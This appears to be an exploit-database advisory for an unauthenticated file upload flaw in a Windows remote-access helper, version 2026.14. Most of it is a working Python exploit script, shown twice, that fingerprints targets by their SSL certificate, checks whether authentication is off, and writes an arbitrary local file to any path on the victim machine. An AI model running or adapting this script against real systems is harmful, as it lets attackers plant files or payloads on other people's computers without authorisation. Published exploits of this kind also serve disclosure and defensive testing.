Description
Remote Sunrise Helper for Windows version 2026.14 suffers from an unauthenticated file upload vulnerability...
Basic Information
ID
PACKETSTORM:219234
Published
Apr 20, 2026 at 00:00
Affected Product
Affected Versions
#!/usr/bin/env python3
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated File Upload
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11
#
# Identification:
# nmap -p- -T4 <target> --script ssl-cert
# Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
import requests, json, sys, urllib3, os, uuid
urllib3.disable_warnings()
if len(sys.argv) < 5:
print(f"Usage: {sys.argv[0]} <target_ip> <api_port> <local_file>
<remote_path>")
print(f"Example: {sys.argv[0]} 192.168.1.103 49737 payload.txt
'C:/Users/Public/pwned.txt'")
sys.exit(1)
target = sys.argv[1]
api_port = sys.argv[2]
local_file = sys.argv[3]
remote_path = sys.argv[4]
url = f"https://{target}:{api_port}"
headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
try:
r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
data = r.json()
if data.get("requires.auth") == False:
http_port = data.get("http.port")
print(f"[+] VULNERABLE - {target}")
print(f" Host: {data.get('host.name')} | OS:
{data.get('win.version')}")
print(f" HTTP Port: {http_port}")
file_id = str(uuid.uuid4()).replace("-", "")[:10]
r = requests.get(f"{url}/api/createFile={remote_path}",
headers={**headers, "X-File-ID": file_id},
verify=False)
if r.status_code == 200:
with open(local_file, 'rb') as f:
content = f.read()
r2 = requests.put(f"http://{target}:{http_port}/api/upload",
headers={"X-File-ID": file_id},
data=content)
if r2.status_code == 200:
print(f"[+] File uploaded: {remote_path}")
else:
print(f"[-] Upload failed")
else:
print(f"[-] Create failed")
else:
print(f"[*] Not vulnerable - authentication required")
except Exception as e:
print(f"[-] Error: {e}")
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated File Upload
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11
#
# Identification:
# nmap -p- -T4 <target> --script ssl-cert
# Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
import requests, json, sys, urllib3, os, uuid
urllib3.disable_warnings()
if len(sys.argv) < 5:
print(f"Usage: {sys.argv[0]} <target_ip> <api_port> <local_file>
<remote_path>")
print(f"Example: {sys.argv[0]} 192.168.1.103 49737 payload.txt
'C:/Users/Public/pwned.txt'")
sys.exit(1)
target = sys.argv[1]
api_port = sys.argv[2]
local_file = sys.argv[3]
remote_path = sys.argv[4]
url = f"https://{target}:{api_port}"
headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
try:
r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
data = r.json()
if data.get("requires.auth") == False:
http_port = data.get("http.port")
print(f"[+] VULNERABLE - {target}")
print(f" Host: {data.get('host.name')} | OS:
{data.get('win.version')}")
print(f" HTTP Port: {http_port}")
file_id = str(uuid.uuid4()).replace("-", "")[:10]
r = requests.get(f"{url}/api/createFile={remote_path}",
headers={**headers, "X-File-ID": file_id},
verify=False)
if r.status_code == 200:
with open(local_file, 'rb') as f:
content = f.read()
r2 = requests.put(f"http://{target}:{http_port}/api/upload",
headers={"X-File-ID": file_id},
data=content)
if r2.status_code == 200:
print(f"[+] File uploaded: {remote_path}")
else:
print(f"[-] Upload failed")
else:
print(f"[-] Create failed")
else:
print(f"[*] Not vulnerable - authentication required")
except Exception as e:
print(f"[-] Error: {e}")